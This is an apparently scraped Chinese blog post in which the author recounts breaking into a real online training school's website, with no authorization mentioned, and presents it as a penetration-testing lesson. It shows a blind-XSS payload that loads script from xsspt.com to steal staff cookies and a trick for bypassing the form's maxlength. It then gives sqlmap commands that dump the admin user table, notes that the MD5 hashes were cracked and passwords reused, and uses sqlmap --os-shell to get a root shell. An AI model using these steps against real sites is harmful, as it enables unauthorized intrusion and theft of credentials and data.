住房与城乡建设部建设环境工程技术中心网站,查工程中标信息哪个网站,wordpress魔术,wordpress产品参数多图一、起因
emmm#xff0c;炎炎夏日到来#xff0c;这么个桑拿天干什么好呢#xff1f;
没错#xff0c;一定要坐在家里#xff0c;吹着空调#xff0c;吃着西瓜#xff0c;然后静静地挖洞。挖洞完叫个外卖#xff0c;喝着啤酒#xff0c;撸着烧烤#xff0c;岂不美…一、起因
emmm炎炎夏日到来这么个桑拿天干什么好呢
没错一定要坐在家里吹着空调吃着西瓜然后静静地挖洞。挖洞完叫个外卖喝着啤酒撸着烧烤岂不美哉然此可为智者道难为俗人言也。。。正在我沉迷在对夏日的意淫之时我亲爱的妈妈忽然给我来了一波夺命连环call。
大概内容如下--妈妈儿呀。。。你印布隐私认不认识搞公务员培训的机构帮我在网上瞅瞅去我有个朋友他儿想考公务员~--我声音笑嘻嘻心里mmp哎呀这个bia的天搁家里睡觉行了。。别弄了。。--妈妈MLGB叫你整你就快点的晚上给我回电话。哎父母之命不可违悲伤的我只能放下手里的键盘和瓜皮开始去百度上找培训机构。百度上面找了好久都没找到太合适的。问了问身边的朋友朋友给了一家网校的报名地址 http://.com/3g//2203947.htm
没错还带免费试学。。。真的先进。。。。 然而作为一名做培训的职业小学生怎么肯轻信这种网校的培训质量于是打开爱站查了一波权重。。。
这尼玛百度权7emmm有点意思。见到这么高权重的站那时我已饥渴难耐便决定对此站点来一波渗透测试。
二、XSS盲打安排一下 看到这里小伙伴们肯定想。。。emm是不是可以XSS打一下试试呢 说干咱就干。。。见框就插,接下来就插入xss payload试试吧。。。 Payload: /textareascript srchttp://xsspt.com/z6ocdy?1531815744/script 将payload完整黏贴进去如图发现仅有/tex 这四个字符
审查元素看下在表单处理上设置了maxlength直接审查元素大法改掉就好了 max length改为999 然后我们的XSS Payload就可以正常地全部输入到表单中了
手机那个文本框我随便填了11位数字然后点击提交万幸的的是提交成功了后端没对内容进行验证 过了大概1个小时突然XSS平台的邮件来了兴奋ing。。。客服是真的敬业
拿着cookie挂好代理傻啦吧唧地就是进入后台一波浏览发现权限非常小基本上只能处理处理客服工作
不过可以查看后台的管理员账号。。。。。果然是个大站后台分工权限这么讲究。。。
看着这么多的超级管理员账号而我却只是个吊毛客服基本上没什么权限心里真的难受的一批。。 难道我们的渗透到这里就要结束不可能这显然不符合本屌的风格。。。
于是我又仔细地翻了翻后台看看有没有地方可以来一波骚操作。。。
三、后台SQL注入讲究
大家可以看到我们的客服处理界面是可以进行查询的查询的过程是通过GET方式传导一个mobile参数实现查询
我们直接测试一下SQL注入的Payload看看是否存在注入。发现页面没有返回信息那么就很有可能存在SQL注入。
我们使用BurpSuite来抓取本出的的HTTP请求然后保存在C:\Users\Samsung 700Z5C\Desktop\1.txt中
接下来到了以小勃大紧张刺激的时刻使用SQLMAP的 -r参数注入本HTTP请求 sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt
注入成功了。哈哈哈。。。。我们开始直奔管理员的表 命令为sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --tables -D nd_net //列出nd_net数据库的表
然后执行 sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --columns -T net_admin_user -D nd_net //列出net_admin_user表的字段
最后执行命令 sqlmap.py -r I:\T00l\1.txt --dump -C id,nd_user,userid,nd_pass -T net_admin_user -D nd_net --threads10 //导出net_admin_user表中id,nd_user,userid,nd_pass几个字段的数据
全部是md5加密拿到cmd5一波解密成功获取到所有管理员的账号密码然后成功登陆以管理员的权限登陆后台
哈哈讲究
四、不拿Shell与咸鱼有什么区别
emm就算是管理员的权限。我发现可以利用的地方依然很少只有一些静态页面的编辑权限而且编辑器是KindEditor没什么方法上传拿Shell,我当时十分绝望。。。但是我发现了这个——数据库备份
点击后跳转到一款叫做“帝国备份王”的程序
随后我便去该程序的官网下载了一个帮助文档。使用默认用户admin/123456进行登陆但是以失败告终。 但我怎末可能放弃我一个一个测试了之前后台SQL注入得到的密码有验证码没法爆破的最终在一个密码上成功地登陆了。。。我靠高兴死我。。。。。。。。
发现了一个PHP探针
再掏出SQLMAP直接使用命令 sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --os-shell //获取shell
输入我们通过探针得到的路径很幸运ROOT权限直接os-shell成功。直接上一句话GetShell完美结束
五、总结
本次渗透测试虽然没有骚操作但是总体来说用到了许多知识现进行总结 1.XSS盲打技术 2.SQLMAP注入HTTP响应包的语法 3.人性的弱点分析多个程序用同一个管理密码 4.从获取绝对路径到SQLMAP获取shell 5.审查元素小技巧
有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660需要代码审计、渗透测试、红蓝对抗网络安全相关业务可以私聊笔者
2000人网络安全交流群欢迎大佬们来玩 群号820783253
